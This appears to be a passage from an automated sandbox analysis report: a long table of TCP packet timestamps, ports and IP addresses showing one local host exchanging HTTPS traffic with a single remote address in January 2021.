,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 21:38:13.706429958 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:13.727715015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:13.727855921 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:13.739692926 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:13.761064053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:13.766139030 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:13.766165018 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:13.766292095 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:13.780644894 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:13.801815987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:13.801839113 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:13.801974058 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.061072111 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.082371950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207530022 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207556963 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207577944 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207593918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207612991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207634926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207653046 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207685947 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.207865953 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207890034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207897902 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.207915068 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.207918882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.207942963 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.207961082 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.208637953 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.208661079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.208683014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.208692074 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.208709002 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.209446907 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.209518909 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.227010012 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.230285883 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.230305910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.230438948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.260128975 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260154009 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260202885 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260221004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260317087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.260431051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260452986 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260462999 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.260472059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.260483980 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.260507107 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.260992050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.261018038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.261039019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.261064053 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.261079073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.261682987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.261706114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.261724949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.261765957 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.261779070 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.262449980 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.262471914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.262491941 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.262512922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.262526989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.263205051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.263228893 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.263248920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.263262987 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.263286114 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.264012098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.264034986 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.264055014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.264070988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.264087915 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.264657021 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.264707088 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.289442062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.289469004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.289488077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.289505959 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.289633036 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.300046921 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.315654993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.315682888 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.315701008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.315711021 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.315884113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.315959930 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.315982103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.315998077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.316020966 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.316040993 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.316479921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.316503048 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.316523075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.316545010 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.316560030 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.317241907 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.317265987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.317286968 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.317321062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.317336082 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.317949057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.317972898 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.317992926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.318031073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.318044901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.318691015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.318712950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.318734884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.318773031 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.318795919 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.319380045 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.319402933 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.319425106 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.319433928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.319443941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.319458008 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.319991112 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.320221901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.320245028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.320267916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.320267916 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.320278883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.320298910 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.320910931 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.320935011 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.320955038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.320955038 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.320969105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.320983887 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.321724892 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.321746111 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.321765900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.321779013 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.321790934 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.321806908 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.322467089 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.322489023 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.322509050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.322516918 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.322530985 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.322541952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.322717905 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.323240042 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.323261976 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.323282003 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.323286057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.323298931 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.323312998 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.323956013 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.323966026 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.323980093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.323993921 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.324003935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.324012041 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.324038982 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.324060917 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.324682951 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.324706078 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.324733973 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.324748039 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.343369961 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.343400002 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.343421936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.343549967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.343673944 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.343693018 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.343727112 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.371265888 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.371298075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.371319056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.371454000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.371543884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.371567965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.371589899 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.371597052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.371608973 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.371625900 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.372308016 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.372333050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.372353077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.372385025 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.372400999 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.373100996 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.373136044 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.373157024 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.373173952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.373187065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.373945951 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.373970032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.373990059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.374001980 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.374017954 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.374605894 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.374633074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.374654055 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.374661922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.374681950 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.374701977 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.375371933 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.375397921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.375418901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.375427961 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.375442982 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.375456095 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.375794888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.376017094 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.376040936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.376063108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.376063108 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.376079082 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.376096964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.376763105 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.376786947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.376806021 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.376808882 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.376821995 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.376837969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.377513885 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.377537966 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.377558947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.377563953 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.377576113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.377594948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.378274918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.378299952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.378320932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.378325939 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.378339052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.378370047 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.378489017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.378978014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.379002094 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.379023075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.379025936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.379045963 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.379061937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.379734993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.379759073 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.379774094 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.379776001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.379800081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.379826069 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.379843950 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.380537033 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.380568981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.380590916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.380592108 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.380629063 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.381273031 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.381297112 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.381316900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.381325006 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.381349087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.381367922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.382024050 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.382050037 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.382071018 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.382093906 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.382112026 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.383802891 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.392647982 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.392676115 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.392822027 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.398984909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.399013042 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.399035931 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.399167061 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.399251938 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.399269104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.399298906 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.399316072 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.425935984 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.425966978 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.425977945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.426184893 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.428777933 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.428803921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.428827047 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.428843975 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.428935051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429114103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429136038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429143906 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429158926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429169893 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429174900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429191113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429209948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429507971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429533005 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429553032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429574013 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.429583073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429594994 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.429596901 CET	443	49167	172.67.150.228	192.168.2.22
